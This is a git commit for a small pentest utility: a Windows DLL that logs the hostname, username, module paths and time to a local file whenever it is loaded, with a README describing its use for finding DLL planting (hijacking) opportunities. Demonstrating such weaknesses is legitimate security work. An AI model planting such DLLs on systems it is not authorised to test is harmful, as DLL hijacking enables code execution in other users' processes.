Initial commit

Author: richardleach

README.md

@@ -1 +1,27 @@
-# whocalls
+# What
+
+___whocalls___ is a simple Windows DLL that logs some info whenever it gets loaded.
+
+# Why
+
+For use in identifying and demonstrating DLL planting opportunities.
+
+(I can never find other people's implementations when I need them.)
+
+# How
+
+1. Customise the output filename in the source code.
+
+2. Compile to PE format.
+
+  e.g. Using MinGW on Kali:
+
+  `x86_64-w64-mingw32-gcc -shared -s -o whocalls.dll whocalls.c`
+
+3. Customise the DLL name and drop it somewhere.
+3. Periodically review the log file.
+
+# Where
+
+That's up to you.
+

whocalls.c

@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <time.h>
+#include <windows.h>
+
+
+#if defined(__cplusplus)
+extern "C" {
+#endif
+  __declspec(dllexport) int DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
+  {
+    
+    if (fdwReason != 1 && fdwReason !=2) { // DLL_PROCESS_ATTACH or DLL_THREAD_ATTACH
+        return 1;
+    }
+    
+    FILE *fp;
+    fp  = fopen ("C:/HONKHONK.TXT", "a"); // You probably want to customise this... ;-)
+    
+    char hostname[255] = "";
+    ZeroMemory(hostname, sizeof(hostname) );
+    DWORD CompBuffer = 255;
+    GetComputerName(hostname, &CompBuffer);
+
+    char username[255] = "";
+    ZeroMemory(username, sizeof(username) );
+    DWORD NameBuffer = 255;
+    GetUserName(username, &NameBuffer);
+
+    char dllpath[65535];
+	GetModuleFileName(hinstDLL, dllpath, sizeof(dllpath));
+
+    char exepath[65535];
+    GetModuleFileName(NULL, exepath, sizeof(exepath));
+
+    SYSTEMTIME st;
+    GetSystemTime(&st); // This is UTC time. GetLocalTime, er, gets the local time
+    
+    fprintf(fp, "%s|%s|%s|%s|%d|%d/%d/%d %d:%d:%d:%d\n", hostname, username, dllpath, exepath, fdwReason, st.wDay, st.wMonth, st.wYear, st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);
+
+
+    fclose (fp);
+    return 1;
+  }
+
+#if defined(__cplusplus)
+}
+#endif